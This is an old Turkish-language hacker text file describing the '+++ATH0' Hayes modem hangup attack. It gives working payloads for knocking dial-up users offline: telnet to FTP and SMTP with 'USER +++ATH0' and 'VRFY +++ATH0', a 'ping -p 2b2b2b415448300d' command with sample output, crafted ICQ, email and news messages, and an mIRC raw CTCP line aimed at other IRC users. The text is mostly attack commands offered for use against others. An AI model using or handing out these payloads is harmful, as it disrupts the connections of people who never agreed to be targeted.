 Modemlere Dos saldırısı
Piyasadaki bir cok modem Hayes Komut Seti (ATZ, ATDT, ATH0..) kullanirlar.
Maalesef ki(?) bu tip modemler bazi ozel stringlerin i$lenmesine de izin verirler.
Ornegin "+++ATH0" ifadesi, modeme kullanicinin manuel olarak komut girdigini(girecegini) belirtir. Bunu kullandiginiz anda modem 'ready' durumuna gecer.
yani resetlenir,sizi bekler sessiz sessiz. internet dial-up baglantiniz kopmu$tur. i$te hikayenin ozu bu.
Bu attacktan tum modemler etkilenmez.
Ornegin U.S. Robotics, 33.6
(+++'dan hemen sonra bir anlik(=1 saniye) pause gerceklestirdiklerinden dolayi ATH0 devreye giremez)
Eger kendi modeminiz de bundan etkileniosa o zaman attack yapinca buyuk bir olasilikla sizin hattiniz hemen kopacaktir .
PPP, IP datagramI default olarak sIkI$tIrmadan gonderir o yuzden o stringi sizin modem elinden gecirir gecirmez aynen
okuyacagindan hat kesilme durumu gercekle$ir
Tipik attack ornekleri:
1) 21 portuna telnet ile:
elusive# telnet 199.99.99.99 21
Trying 199.99.99.99...
Connected to 192.168.1.1.
Escape character is '^]'.
220 abc FTP server (Version .............](1) Fri Apr 9
23:41:
USER +++ATH0
^]
telnet> close
Connection closed.
elusive# telnet 192.168.1.1 21
Trying 199.99.99.99...
telnet: Unable to connect to remote host: Network is unreachable
elusive#
2) sendmaile telnet ile baglan?n (qmail olunca olmuyor) ve "HELO orasi.com" yaz?n orasi neresiyse baglaninca welcome vs diycektir..
sonra: VRFY +++ATH0
sana normal olarak $oyle dese de dial-up modem buyuk bir olasilikla koptu:
550 +++ATH0
3) ftp'ye baglan?n. USER +++ATH0 kullan?n.Diycektir ki:
331 Password required for +++ATH0
dese de iptal buyuk bi olasilikla(dial-up baglantisi oldugunu varsayiyoruz tabi).
4) IRC'deki karsinizdakine bi ICMP ECHO_REQUEST paketi gonderirseniz ki bu paket +++ATH0 icermeli,
ondan gelecek ICMP ECHO_RESPONSE paketi gonderdiginiz paket iceriginin aynisina sahip olacagindan karsidakine +++ATH0
yaptirmis olursunuz ve baglantisi kopar. Bunu nasil mi yapicaz?... bi program yazcaksin ;p
5) Linux'tan ping olayina gireriz : (-p pattern option'u linuxta var windows'ta olmaz)
(Ping modem killer ilk defa MrPhoenix (phoenix@iname.com) tarafindan bahsedilmi$tir.)
+++ATH0--> 2b2b2b415448300d (en sondaki 0d=13 biliyorsunuz enter)
#ping -p 2b2b2b415448300d -c 5 xxx.xxx.xxx.xxx
PATTERN: 0x2b2b2b415448300d
PING xxx.xxx.xxx.xxx (xxx.xxx.xxx.xxx): 56 data bytes
--- xxx.xxx.xxx.xxx ping statistics ---
5 packets transmitted, 0 packets received, 100% packet loss
5 paket gitti..1-2 paket bazan yetmiyor(nedense??).
cali$madIgI durum:
# ping -p 2b2b2b415448300d -c 5 xxx.xxx.xxx.xxx
PATTERN: 0x2b2b2b415448300d
PING xxx.xxx.xxx.xxx (xxx.xxx.xxx.xxx): 56 data bytes
64 bytes from xxx.xxx.xxx.xxx: icmp_seq=0 ttl=252 time=182.4 ms
64 bytes from xxx.xxx.xxx.xxx: icmp_seq=1 ttl=252 time=190.1 ms
64 bytes from xxx.xxx.xxx.xxx: icmp_seq=2 ttl=252 time=190.1 ms
64 bytes from xxx.xxx.xxx.xxx: icmp_seq=3 ttl=252 time=190.1 ms
64 bytes from xxx.xxx.xxx.xxx: icmp_seq=4 ttl=252 time=180.1 ms
--- xxx.xxx.xxx.xxx ping statistics ---
5 packets transmitted, 5 packets received, 0% packet loss
round-trip min/avg/max = 180.1/186.5/190.1 ms
peki ya e-mail? e-mailde de denedim ..mesaj kIsmIna +++ATH0 yazarsan
cok ilginc seyler olur. eger senin modem vulnerable ise senin hat kopar.
degilse..maili alan kisi alirken problem ya$ar.
ICQ Mesajın içine aynı komutu yazın. Karsı makine buyuk olasılıkla hattan dusecektir. (phyton)
Bu komutun yazı ile de olsa yazılı oldugu bir htm dosyasını upload etmeye calısın %90 baglantınız kopacak. (phyton)
News serverda deneyin (Bunu denemedim) News servera bu komut iceren bir mesaj atın. Mesajı okumak isteyenler dusecektir. (phyton)
IRC icin bir rivayete gore kar$I tarafIn +++ATH0 vermesi icin boyle oldugunu soyluyorlar..
Ben denedim kendi ustumde 1 defa cali$ti 15-20 denememde:
//raw NOTICE nickname : $+ $chr(1) $+ PING +++ATH0 $+ $chr(1)
yukarida satirda hic bir imla ya da yazim hatasI yoktur!.
(ba$ taraftaki iki tane slash da dahiL!)
|
